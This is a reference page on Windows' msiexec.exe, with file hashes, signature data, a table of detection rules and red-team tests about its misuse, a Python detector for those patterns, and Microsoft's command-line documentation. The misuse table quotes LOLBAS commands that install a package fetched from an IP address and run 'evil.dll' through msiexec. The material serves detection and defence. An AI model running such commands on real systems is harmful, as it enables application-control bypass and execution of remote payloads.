msiexec.exe

  • File Path: C:\Windows\SysWOW64\msiexec.exe
  • Description: Windows installer


Hashes

  • MD5: 0BDEAEA7BB4AE7822416CD37EA8EE00D
  • SHA1: 89A76EC5F7465D3ED350652511112131520F8E69
  • SHA256: 5C188CE4E21FAB002B4D669F91FA19341AB4260F83D798FDAC53229D675DB6BA
  • SHA384: 17C201C6F193EC939D2EAE943F431B183C0AEFE902139C6A06B46F289202CD3ED33B34BA0AFC293B88E986C1A0DBB913
  • SHA512: 61184E002E58732E4C7617508F63E454D0E7959957D8AE218D55E0E4E5634C12F02C4D76B3D8ADCCAEF71ADDB804292FEAD0D4FB1FF04FA06C911E77122E34B1
  • SSDEEP: 768:Y48sHQ8TB4LH7jCHURjutImIgcC6F/xHaJI8v5m6rugC5q6MLaody:YqTB4Lb9RjutoKpvLrLNV

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: msiexec.exe.mui
  • Product Name: Windows Installer - Unicode
  • Company Name: Microsoft Corporation
  • File Version: 5.0.14393.0 (rs1_release.160715-1616)
  • Product Version: 5.0.14393.0
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of msiexec.exe being misused. While msiexec.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma godmode_sigma_rule.yml - '\msiexec.exe' DRL 1.0
sigma win_firewall_as_add_rule.yml - 'C:\Windows\SysWOW64\msiexec.exe' DRL 1.0
sigma win_alert_lsass_access.yml - 'C:\Windows\System32\msiexec.exe' DRL 1.0
sigma win_alert_lsass_access.yml - 'C:\Windows\SysWOW64\msiexec.exe' DRL 1.0
sigma sysmon_suspicious_remote_thread.yml - '\msiexec.exe' DRL 1.0
sigma file_event_win_cve_2021_41379_msi_lpe.yml description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file DRL 1.0
sigma file_event_win_cve_2021_41379_msi_lpe.yml Image|endswith: '\msiexec.exe' DRL 1.0
sigma file_event_win_susp_clr_logs.yml - https://twitter.com/SBousseaden/status/1388064061087260675 - rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process DRL 1.0
sigma image_load_suspicious_dbghelp_dbgcore_load.yml # - '\msiexec.exe' an installer installing a program using one of those DLL will raise an alert DRL 1.0
sigma image_load_suspicious_vss_ps_load.yml - '\msiexec.exe' DRL 1.0
sigma net_connection_win_msiexec.yml title: Msiexec Initiated Connection DRL 1.0
sigma net_connection_win_msiexec.yml Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. DRL 1.0
sigma net_connection_win_msiexec.yml Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) DRL 1.0
sigma net_connection_win_msiexec.yml - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec DRL 1.0
sigma net_connection_win_msiexec.yml Image|endswith: '\msiexec.exe' DRL 1.0
sigma net_connection_win_msiexec.yml - Legitimate msiexec over networks DRL 1.0
sigma proc_access_win_cred_dump_lsass_access.yml - 'C:\Windows\syswow64\MsiExec.exe' DRL 1.0
sigma proc_access_win_cred_dump_lsass_access.yml - 'C:\Windows\System32\msiexec.exe' DRL 1.0
sigma proc_access_win_susp_proc_access_lsass.yml - 'C:\Windows\SysWOW64\msiexec.exe' DRL 1.0
sigma proc_access_win_susp_proc_access_lsass.yml - 'C:\Windows\System32\msiexec.exe' DRL 1.0
sigma proc_access_win_svchost_cred_dump.yml - '*\msiexec.exe' DRL 1.0
sigma proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml description: This rule looks for Windows Installer service (msiexec.exe) spawned command line and/or powershell DRL 1.0
sigma proc_creation_win_always_install_elevated_windows_installer.yml description: This rule looks for Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege DRL 1.0
sigma proc_creation_win_always_install_elevated_windows_installer.yml Image|endswith: '\msiexec.exe' DRL 1.0
sigma proc_creation_win_always_install_elevated_windows_installer.yml - CommandLine|endswith: '\system32\msiexec.exe /V' # ignore "repair option" DRL 1.0
sigma proc_creation_win_always_install_elevated_windows_installer.yml - ParentCommandLine|endswith: '\system32\msiexec.exe /V' # ignore "repair option" DRL 1.0
sigma proc_creation_win_attrib_hiding_files.yml - msiexec.exe hiding desktop.ini DRL 1.0
sigma proc_creation_win_lolbins_by_office_applications.yml - 'msiexec' DRL 1.0
sigma proc_creation_win_lolbins_with_wmiprvse_parent_process.yml - 'msiexec' DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml title: Suspicious Msiexec Execute Arbitrary DLL DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml Image|endswith: '\msiexec.exe' DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml - '\MsiExec.exe" /Y "C:\Program Files\Bonjour\mdnsNSP.dll' DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml - '\MsiExec.exe" /Y "C:\Program Files (x86)\Bonjour\mdnsNSP.dll' DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml - '\MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\ScriptingObjectModel.dll' DRL 1.0
sigma proc_creation_win_msiexec_execute_dll.yml - '\MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\SoftwareUpdateAdmin.dll' DRL 1.0
sigma proc_creation_win_msiexec_install_quiet.yml title: Suspicious Msiexec Quiet Install DRL 1.0
sigma proc_creation_win_msiexec_install_quiet.yml Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. DRL 1.0
sigma proc_creation_win_msiexec_install_quiet.yml Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) DRL 1.0
sigma proc_creation_win_msiexec_install_quiet.yml - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec DRL 1.0
sigma proc_creation_win_msiexec_install_quiet.yml Image|endswith: '\msiexec.exe' DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml - 'msiexec' DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml - '*msiexec*' DRL 1.0
sigma proc_creation_win_office_shell.yml - '\msiexec.exe' DRL 1.0
sigma proc_creation_win_outlook_shell.yml - '\msiexec.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - 'msiexec.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - '\msiexec.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - 'msiexec.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - '\msiexec.exe' DRL 1.0
sigma proc_creation_win_run_executable_invalid_extension.yml ParentImage|endswith: ':\Windows\SysWOW64\msiexec.exe' DRL 1.0
sigma proc_creation_win_run_executable_invalid_extension.yml CommandLine|startswith: 'C:\Windows\syswow64\MsiExec.exe -Embedding' DRL 1.0
sigma proc_creation_win_script_event_consumer_spawn.yml - '\msiexec.exe' DRL 1.0
sigma proc_creation_win_susp_msiexec_cwd.yml title: Suspicious MsiExec Directory DRL 1.0
sigma proc_creation_win_susp_msiexec_cwd.yml description: Detects suspicious msiexec process starts in an uncommon directory DRL 1.0
sigma proc_creation_win_susp_msiexec_cwd.yml Image|endswith: '\msiexec.exe' DRL 1.0
sigma proc_creation_win_susp_msiexec_web_install.yml title: MsiExec Web Install DRL 1.0
sigma proc_creation_win_susp_msiexec_web_install.yml description: Detects suspicious msiexec process starts with web addresses as parameter DRL 1.0
sigma proc_creation_win_susp_msiexec_web_install.yml - https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/ DRL 1.0
sigma proc_creation_win_susp_msiexec_web_install.yml - ' msiexec' DRL 1.0
sigma proc_creation_win_susp_servu_process_pattern.yml - '\msiexec.exe' DRL 1.0
sigma registry_event_asep_reg_keys_modification_winsock2.yml - Image: 'C:\Windows\System32\MsiExec.exe' DRL 1.0
sigma registry_event_asep_reg_keys_modification_winsock2.yml - Image: 'C:\Windows\syswow64\MsiExec.exe' DRL 1.0
sigma registry_event_office_vsto_persistence.yml - '\msiexec.exe' DRL 1.0
sigma registry_event_ssp_added_lsa_config.yml - Image: C:\Windows\system32\msiexec.exe DRL 1.0
sigma registry_event_ssp_added_lsa_config.yml - Image: C:\Windows\syswow64\MsiExec.exe DRL 1.0
sigma registry_event_vbs_payload_stored.yml Image|endswith: '\msiexec.exe' DRL 1.0
sigma sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml description: This rule looks for Windows Installer service (msiexec.exe) spawning command line and/or powershell that spawns other processes DRL 1.0
sigma sysmon_always_install_elevated_parent_child_correlated.yml description: This rule will look for any process with low privilege launching Windows Installer service (msiexec.exe) that tries to install MSI packages with SYSTEM privilege DRL 1.0
sigma sysmon_always_install_elevated_parent_child_correlated.yml Image|endswith: '\msiexec.exe' DRL 1.0
LOLBAS Msiexec.yml Name: Msiexec.exe  
LOLBAS Msiexec.yml - Command: msiexec /quiet /i cmd.msi  
LOLBAS Msiexec.yml - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png  
LOLBAS Msiexec.yml - Command: msiexec /y "C:\folder\evil.dll"  
LOLBAS Msiexec.yml - Command: msiexec /z "C:\folder\evil.dll"  
LOLBAS Msiexec.yml - Path: C:\Windows\System32\msiexec.exe  
LOLBAS Msiexec.yml - Path: C:\Windows\SysWOW64\msiexec.exe  
LOLBAS Msiexec.yml - IOC: msiexec.exe retrieving files from Internet  
LOLBAS Msiexec.yml - Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/  
atomic-red-team index.md - T1218.007 Msiexec MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Msiexec.exe - Execute Arbitrary DLL [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1218.007 Msiexec MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Msiexec.exe - Execute Arbitrary DLL [windows] MIT License. © 2018 Red Canary
atomic-red-team matrix.md Msiexec (matrix table cell) MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md Msiexec (matrix table cell) MIT License. © 2018 Red Canary
atomic-red-team T1047.md msiexec /i PathToAtomicsFolder\T1047\bin\tightvncinstaller.msi /qn /norestart MIT License. © 2018 Red Canary
atomic-red-team T1072.md msiexec /i "#{radmin_installer}" /qn MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md # T1218.007 - Msiexec MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft. MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018) MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md - Atomic Test #1 - Msiexec.exe - Execute Local MSI file MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md - Atomic Test #2 - Msiexec.exe - Execute Remote MSI file MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md - Atomic Test #3 - Msiexec.exe - Execute Arbitrary DLL MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md ## Atomic Test #1 - Msiexec.exe - Execute Local MSI file MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md msiexec.exe /q /i "#{msi_payload}" MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md ## Atomic Test #2 - Msiexec.exe - Execute Remote MSI file MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md ## Atomic Test #3 - Msiexec.exe - Execute Arbitrary DLL MIT License. © 2018 Red Canary
atomic-red-team T1218.007.md msiexec.exe /y "#{dll_payload}" MIT License. © 2018 Red Canary
atomic-red-team T1219.md Msiexec will be used to quietly install ScreenConnect. MIT License. © 2018 Red Canary
atomic-red-team T1219.md msiexec /i $installer /qn MIT License. © 2018 Red Canary
atomic-red-team T1219.md msiexec /x $installer /qn MIT License. © 2018 Red Canary
atomic-red-team T1555.003.md msiexec /i $installer /qn MIT License. © 2018 Red Canary
atomic-red-team T1564.006.md msiexec /x #{msi_file_path} /qn MIT License. © 2018 Red Canary
atomic-red-team T1564.006.md msiexec /i #{msi_file_path} /qn MIT License. © 2018 Red Canary
signature-base apt_apt29_nobelium_may21.yar Not shared publicly: rules for CobaltStrike loader samples, ISOs, specific msiexec method found in some samples CC BY-NC 4.0
signature-base apt_blackenergy.yar $s2 = "msiexec.exe" fullword wide CC BY-NC 4.0
signature-base apt_win_plugx.yar $s2 = "%s\msiexec.exe %d %d" fullword wide CC BY-NC 4.0
signature-base apt_win_plugx.yar $s4 = "%s\msiexec.exe UAC" fullword wide CC BY-NC 4.0
signature-base thor-hacktools.yar $x1 = "msiexec /f c:\users\%username%\downloads\" fullword ascii CC BY-NC 4.0
signature-base thor-hacktools.yar $s2 = "Full path: C:\Windows\system32\msiexec.exe /V" fullword wide CC BY-NC 4.0
stockpile 60f63260-39bb-4136-87a0-b6c2dca799fc.yml Start-Process msiexec.exe -ArgumentList "/package PowerShellCore.msi /quiet ADD_EXPLORER_CONTEXT_MENU_OPENPOWERSHELL=1 ENABLE_PSREMOTING=1 REGISTER_MANIFEST=1" -Wait; Apache-2.0
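As an added example (not part of this page, nor code from the Sigma, LOLBAS or Atomic Red Team projects), the following Python applies several of the msiexec misuse patterns collected in the table above to constructed Sysmon-style process-creation events: a web address as the package path, DLL execution via /y or /z, a renamed binary, msiexec spawning a shell, a start from an uncommon directory, and the "-Embedding" COM form that one of the rules filters out as benign. The event fields, the pattern names and the user-path heuristic for quiet installs are assumptions made for this example.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation event (Sysmon Event ID 1 style); constructed, not real telemetry."""
    image: str              # full path of the started process
    cmdline: str            # its command line
    parent_image: str       # full path of the parent process
    original_filename: str  # PE OriginalFileName as Sysmon reports it


URL_RE = re.compile(r"(?:https?|ftp)://", re.I)
MSIEXEC_IMAGE_RE = re.compile(r"\\msiexec\.exe$", re.I)
DLL_SWITCH_RE = re.compile(r"(?:^|\s)/[yz](?=\s|$)", re.I)   # /y registers, /z unregisters a DLL
QUIET_RE = re.compile(r"(?:^|\s)/(?:q[nbrf]?[+!]*|quiet|passive)(?=\s|$)", re.I)
USER_PATH_RE = re.compile(r"\\users\\[^\\]+\\(?:appdata|downloads)\\", re.I)
SHELLS = ("\\cmd.exe", "\\powershell.exe", "\\pwsh.exe")
EXPECTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def is_msiexec(path: str) -> bool:
    return MSIEXEC_IMAGE_RE.search(path) is not None


def check_event(ev: ProcEvent) -> list[str]:
    """Return the names of the misuse patterns from the table above that match this event."""
    hits: list[str] = []
    image = ev.image.lower()
    # Renamed binary: PE metadata still says msiexec.exe but the file name does not.
    if ev.original_filename.lower().startswith("msiexec.exe") and not is_msiexec(image):
        hits.append("renamed_msiexec")
    # Installer spawning a shell (the AlwaysInstallElevated abuse pattern).
    if is_msiexec(ev.parent_image) and image.endswith(SHELLS):
        hits.append("installer_spawned_shell")
    if not is_msiexec(image):
        return hits
    # "-Embedding" is the COM activation form that the rules above filter out as benign.
    if " -embedding" in ev.cmdline.lower():
        return hits
    if not image.startswith(EXPECTED_DIRS):
        hits.append("msiexec_uncommon_directory")
    if URL_RE.search(ev.cmdline):
        hits.append("msiexec_web_install")
    if DLL_SWITCH_RE.search(ev.cmdline):
        hits.append("msiexec_execute_dll")
    # Assumption: a silent install of a package under a user-writable path deserves a look.
    if QUIET_RE.search(ev.cmdline) and USER_PATH_RE.search(ev.cmdline):
        hits.append("msiexec_quiet_install_user_path")
    return hits


SYS32 = r"C:\Windows\System32"
EXPLORER = SYS32 + r"\explorer.exe"

# Constructed sample events: five suspicious, one benign (index 4).
SAMPLE_EVENTS = [
    ProcEvent(SYS32 + r"\msiexec.exe", 'msiexec /q /i "http://example.invalid/setup.msi"', EXPLORER, "msiexec.exe"),
    ProcEvent(SYS32 + r"\msiexec.exe", r'msiexec /y "C:\Users\alice\AppData\Local\Temp\evil.dll"', EXPLORER, "msiexec.exe"),
    ProcEvent(r"C:\Users\alice\AppData\Local\Temp\update.exe", "update.exe /qn /i setup.msi", EXPLORER, "msiexec.exe"),
    ProcEvent(SYS32 + r"\cmd.exe", "cmd.exe /c whoami", SYS32 + r"\msiexec.exe", "Cmd.Exe"),
    ProcEvent(r"C:\Windows\SysWOW64\msiexec.exe", r"C:\Windows\syswow64\MsiExec.exe -Embedding 4A2B", SYS32 + r"\svchost.exe", "msiexec.exe"),
    ProcEvent(r"C:\Users\bob\Downloads\msiexec.exe", r'msiexec /qn /i "C:\Users\bob\Downloads\tool.msi"', EXPLORER, "msiexec.exe"),
]


def scan(events=SAMPLE_EVENTS) -> list[tuple[str, list[str]]]:
    """Pair each firing event's command line with its findings; silent events are dropped."""
    return [(ev.cmdline, hits) for ev in events if (hits := check_event(ev))]


if __name__ == "__main__":
    for cmdline, hits in scan():
        print(f"{cmdline}\n    -> {', '.join(hits)}")
```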

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


msiexec

Provides the means to install, modify, and perform operations on Windows Installer from the command line.

Install options

Set the install type for launching an installation package.

Syntax

msiexec.exe [/i][/a][/j{u|m|/g|/t}][/x] <path_to_package>

Parameters

  • /i: Specifies normal installation.
  • /a: Specifies administrative installation.
  • /ju: Advertises the product to the current user.
  • /jm: Advertises the product to all users.
  • /j/g: Specifies the language identifier used by the advertised package.
  • /j/t: Applies a transform to the advertised package.
  • /x: Uninstalls the package.
  • <path_to_package>: Specifies the location and name of the installation package file.

Examples

To install a package named example.msi from the C: drive, using a normal installation process, type:

msiexec.exe /i "C:\example.msi"

Display options

You can configure what a user sees during the installation process, based on your target environment. For example, if you’re distributing a package to all clients for manual installation, there should be a full UI. However, if you’re deploying a package using Group Policy, which requires no user interaction, there should be no UI involved.

Syntax

msiexec.exe /i <path_to_package> [/quiet][/passive][/q{n|b|r|f}]

Parameters

  • <path_to_package>: Specifies the location and name of the installation package file.
  • /quiet: Specifies quiet mode, which means there's no user interaction required.
  • /passive: Specifies unattended mode, which means the installation only shows a progress bar.
  • /qn: Specifies there's no UI during the installation process.
  • /qn+: Specifies there's no UI during the installation process, except for a final dialog box at the end.
  • /qb: Specifies there's a basic UI during the installation process.
  • /qb+: Specifies there's a basic UI during the installation process, including a final dialog box at the end.
  • /qr: Specifies a reduced UI experience during the installation process.
  • /qf: Specifies a full UI experience during the installation process.

Remarks
  • The modal box isn’t shown if the installation is cancelled by the user. You can use qb+! or qb!+ to hide the CANCEL button.
Examples

To install package C:\example.msi, using a normal installation process and no UI, type:

msiexec.exe /i "C:\example.msi" /qn

Restart options

If your installation package overwrites files or attempts to change files that are in use, a reboot might be required before the installation completes.

Syntax

msiexec.exe /i <path_to_package> [/norestart][/promptrestart][/forcerestart]

Parameters

  • <path_to_package>: Specifies the location and name of the installation package file.
  • /norestart: Stops the device from restarting after the installation completes.
  • /promptrestart: Prompts the user if a reboot is required.
  • /forcerestart: Restarts the device after the installation completes.

Examples

To install package C:\example.msi, using a normal installation process with no reboot at the end, type:

msiexec.exe /i "C:\example.msi" /norestart

Logging options

If you need to debug your installation package, you can set the parameters to create a log file with specific information.

Syntax

msiexec.exe [/i][/x] <path_to_package> [/L{i|w|e|a|r|u|c|m|o|p|v|x+|!|*}] <path_to_log>

Parameters

  • /i: Specifies normal installation.
  • /x: Uninstalls the package.
  • <path_to_package>: Specifies the location and name of the installation package file.
  • /li: Turns on logging and includes status messages in the output log file.
  • /lw: Turns on logging and includes non-fatal warnings in the output log file.
  • /le: Turns on logging and includes all error messages in the output log file.
  • /la: Turns on logging and includes information about when an action started in the output log file.
  • /lr: Turns on logging and includes action-specific records in the output log file.
  • /lu: Turns on logging and includes user request information in the output log file.
  • /lc: Turns on logging and includes the initial UI parameters in the output log file.
  • /lm: Turns on logging and includes out-of-memory or fatal exit information in the output log file.
  • /lo: Turns on logging and includes out-of-disk-space messages in the output log file.
  • /lp: Turns on logging and includes terminal properties in the output log file.
  • /lv: Turns on logging and includes verbose output in the output log file.
  • /lx: Turns on logging and includes extra debugging information in the output log file.
  • /l+: Turns on logging and appends the information to an existing log file.
  • /l!: Turns on logging and flushes each line to the log file.
  • /l*: Turns on logging and logs all information, except verbose information (/lv) or extra debugging information (/lx).
  • <path_to_logfile>: Specifies the location and name for the output log file.

Examples

To install package C:\example.msi, using a normal installation process with all logging information provided, including verbose output, and storing the output log file at C:\package.log, type:

msiexec.exe /i "C:\example.msi" /L*V "C:\package.log"

Update options

You can apply or remove updates using an installation package.

Syntax

msiexec.exe [/p][/update][/uninstall[/package<product_code_of_package>]] <path_to_package>

Parameters

  • /p: Installs a patch. If you're installing silently, you must also set the REINSTALLMODE property to ecmus and REINSTALL to ALL. Otherwise, the patch only updates the MSI cached on the target device.
  • /update: Install patches option. If you're applying multiple updates, you must separate them using a semi-colon (;).
  • /package: Installs or configures a product.

Examples

msiexec.exe /p "C:\MyPatch.msp"
msiexec.exe /p "C:\MyPatch.msp" /qb REINSTALLMODE="ecmus" REINSTALL="ALL"
msiexec.exe /update "C:\MyPatch.msp"
msiexec.exe /uninstall {1BCBF52C-CD1B-454D-AEF7-852F73967318} /package {AAD3D77A-7476-469F-ADF4-04424124E91D}

Where the first GUID is the patch GUID, and the second one is the MSI product code to which the patch was applied.

Repair options

You can use this command to repair an installed package.

Syntax

msiexec.exe [/f{p|o|e|d|c|a|u|m|s|v}] <product_code>

Parameters

  • /fp: Repairs the package if a file is missing.
  • /fo: Repairs the package if a file is missing, or if an older version is installed.
  • /fe: Repairs the package if a file is missing, or if an equal or older version is installed.
  • /fd: Repairs the package if a file is missing, or if a different version is installed.
  • /fc: Repairs the package if a file is missing, or if the checksum does not match the calculated value.
  • /fa: Forces all files to be reinstalled.
  • /fu: Repairs all the required user-specific registry entries.
  • /fm: Repairs all the required computer-specific registry entries.
  • /fs: Repairs all existing shortcuts.
  • /fv: Runs from source and re-caches the local package.

Examples

To force all files to be reinstalled based on the MSI product code to be repaired, {AAD3D77A-7476-469F-ADF4-04424124E91D}, type:

msiexec.exe /fa {AAD3D77A-7476-469F-ADF4-04424124E91D}

Set public properties

You can set public properties through this command. For information about the available properties and how to set them, see Public Properties.

MIT License. Copyright (c) 2020-2021 Strontic.